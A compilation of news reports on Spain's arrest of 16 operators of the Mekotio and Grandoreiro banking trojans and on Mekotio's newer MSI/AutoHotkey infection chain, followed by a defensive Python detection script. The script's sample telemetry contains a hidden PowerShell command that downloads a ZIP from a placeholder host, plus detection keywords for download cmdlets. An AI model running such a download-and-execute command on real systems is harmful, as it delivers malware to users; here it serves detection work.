Spain arrests 16 fraudsters who used banking trojans Mekotio and Grandoreiro

Spanish law enforcement officials have arrested 16 people linked to the use of the Mekotio and Grandoreiro banking Trojans as part of a malicious campaign targeting financial institutions in Europe.

The arrests were made in Ribeira (La Coruña), Madrid, Parla and Móstoles (Madrid), Seseña (Toledo), Villafranca de los Barros (Badajoz) and Aranda de Duero (Burgos) during Operation Aguas Vivas. According to the police, the criminals used malicious software installed on victims' computers to transfer large sums of money to accounts they controlled.

The police seized computer equipment, mobile phones and documents, and analyzed more than 1,800 spam emails, which allowed law enforcement to block attempted transactions totaling 3.5 million euros. The criminals' proceeds amounted to 276,470 euros, of which 87,000 euros were recovered.

The scammers sent phishing emails to potential victims purporting to come from legitimate delivery services and government agencies, such as the Spanish Treasury. The emails asked users to click a link that silently downloaded malicious software onto their computer.

The Mekotio and Grandoreiro malware let the operators intercept transactions on the bank's website and redirect funds to accounts under the attackers' control. To carry out the fraud, the criminals compromised at least 68 email accounts belonging to official bodies.

Grandoreiro and Mekotio (also known as Melcoz) are part of a family of Brazilian banking Trojans that also includes the Guildma and Javali malware. Active since at least 2016, Grandoreiro has been used to target users in Brazil, Mexico, Spain, Portugal, and Turkey. Mekotio, on the other hand, was seen in attacks targeting Brazil starting in 2018, and then operators started attacking users in Chile, Mexico, and Spain.

Mekotio steals passwords from browsers and from device memory and gives its operators remote access to online banking sessions. The malware also contains functionality for stealing Bitcoin wallet addresses.

• Source: http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853

---

The Mekotio and Grandoreiro Trojans are believed to have been created by Brazilian hacking groups that sell access to their tools to other criminals, who then distribute the malware and launder the proceeds.

Both Trojans are designed for Windows machines and are usually distributed using fake emails that mimic messages from various real organizations. After infecting the victim, the Trojans hide and wait for the user to log in to e-banking in order to steal their credentials unnoticed.

In this way the malware can steal credentials for 30 different banks. Once the attackers gain access to victims' bank accounts, they transfer funds to accounts under their own control.

Law enforcement officials say the criminal organization was structured in a four-level hierarchy. Some members received the fraudulent transfers (level 1) and passed the money on to other members of the group (level 2); others moved the money to accounts located abroad (level 3); and a final tier was responsible for concealing the group's operations (level 4).

"A feature that was noted by all the victims: after performing any banking operation via the Internet, their computers started to reboot and continued until access was blocked. Later it was discovered that at this time large amounts of money were transferred to unknown accounts," representatives of the Guardia Civil say. "After that, the money was divided by sending it to other accounts, withdrawing cash from ATMs, transfers using BIZUM, REVOLUT cards, and so on. All this was done to complicate a possible investigation."

As a reminder, last year Kaspersky Lab experts already warned that Grandoreiro and Melcoz had expanded their attacks and reached users in Europe, North America and Latin America. As the company now notes, Spain has recently suffered the most from these bankers, right after Brazil, the malware's home country.

Experts note with regret that those arrested in Spain were only operators: the creators of Grandoreiro and Melcoz remain at large in Brazil, will continue to develop the malware and will be able to recruit new participants into their "business".

---

Mekotio: Updated banking Trojan targets Latin America

Latin American financial institutions are facing a renewed threat from the banking Trojan Mekotio, also known as Melcoz. According to a recent report from Trend Micro, there has been an increase in cyberattacks involving the distribution of this Windows malware.

The Mekotio Trojan has been active since 2015 and targets users in Brazil, Chile, Mexico, Spain, Peru and Portugal in order to steal banking data. It was first documented by ESET in August 2020. Mekotio belongs to a group of banking Trojans that also includes Guildma, Javali and Grandoreiro.

ESET experts noted at the time that Mekotio has the characteristic features of this malware family: it is written in Delphi, uses fake pop-up windows, has remote-access functions, and targets Spanish- and Portuguese-speaking countries.

The Mekotio distribution operation suffered a blow in July 2021, when Spanish law enforcement authorities arrested 16 people involved in social engineering campaigns aimed at European users.

The attack chain identified by Trend Micro experts begins with tax-themed phishing emails that urge recipients to open a malicious attachment or follow a fake link. Either path leads to the download of an MSI installer, which uses an AutoHotkey (AHK) script to launch the Trojan.

This infection process differs from the earlier one described by Check Point in November 2021, in which an elaborate batch script ran PowerShell to download a ZIP file containing the AHK script.

Once installed, Mekotio collects system information and contacts its C2 server for further instructions. The Trojan's main purpose is to steal banking data by displaying fake pop-up windows that mimic legitimate banking sites. It can also take screenshots, log keystrokes, steal clipboard data, and maintain persistence on the infected device.

The stolen information allows the attackers to gain unauthorized access to victims' bank accounts and make fraudulent transactions. Trend Micro emphasizes that Mekotio is a persistent and constantly evolving threat to financial systems, especially in Latin American countries.
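An added detection example (my code, not Trend Micro's or Check Point's) that flags the two Mekotio delivery chains described above in Windows process-creation telemetry: an MSI installer spawning the AutoHotkey interpreter, and cmd.exe running PowerShell to fetch a ZIP with AutoHotkey executing beneath it. The event schema, executable names and the sample events are assumptions constructed for illustration.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # full command line

def _name(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def _descends(ev, ancestor_pid, by_pid):
    """True if ancestor_pid appears anywhere in ev's parent chain."""
    seen = set()
    while ev is not None and ev.pid not in seen:
        seen.add(ev.pid)
        if ev.ppid == ancestor_pid:
            return True
        ev = by_pid.get(ev.ppid)
    return False

def detect_ahk_loader(events):
    """Return (rule, pid) pairs for the two AHK-based delivery chains."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        child, cl = _name(e.image), e.cmdline.lower()
        # Chain 1 (Trend Micro): MSI installer spawning the AutoHotkey interpreter
        if ("autohotkey" in child or ".ahk" in cl) and _name(parent.image) == "msiexec.exe":
            findings.append(("msi_to_ahk", e.pid))
        # Chain 2 (Check Point): cmd -> PowerShell fetches a ZIP, AHK runs beneath it
        if child == "powershell.exe" and _name(parent.image) == "cmd.exe" \
                and ".zip" in cl and any(h in cl for h in ("downloadfile", "downloadstring", "invoke-webrequest")):
            for f in events:
                if "autohotkey" in _name(f.image) and _descends(f, e.pid, by_pid):
                    findings.append(("ps_zip_to_ahk", f.pid))
    return findings

# Constructed sample telemetry (not a real capture): one MSI chain, one PowerShell chain, and one benign user-launched AutoHotkey (pid 400).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe", r'msiexec.exe /i "C:\Users\u\Downloads\Factura.msi" /qn'),
    ProcEvent(210, 200, r"C:\Users\u\AppData\Local\Temp\AutoHotkey.exe", r"AutoHotkey.exe C:\Users\u\AppData\Local\Temp\a.ahk"),
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c start.bat"),
    ProcEvent(310, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.zip','p.zip')"),
    ProcEvent(320, 310, r"C:\Users\u\ahk\AutoHotkey.exe", "AutoHotkey.exe run.ahk"),
    ProcEvent(400, 100, r"C:\Program Files\AutoHotkey\AutoHotkey.exe", "AutoHotkey.exe macro.ahk"),
]
```

Running `detect_ahk_loader(SAMPLE_EVENTS)` returns the two malicious chains and leaves the benign AutoHotkey process unflagged; in production the same logic would be fed from Sysmon Event ID 1 or an EDR's process-creation stream.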

• Source: https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html

• Source: https://research.checkpoint.com/202...with-improved-stealth-and-ancient-encryption/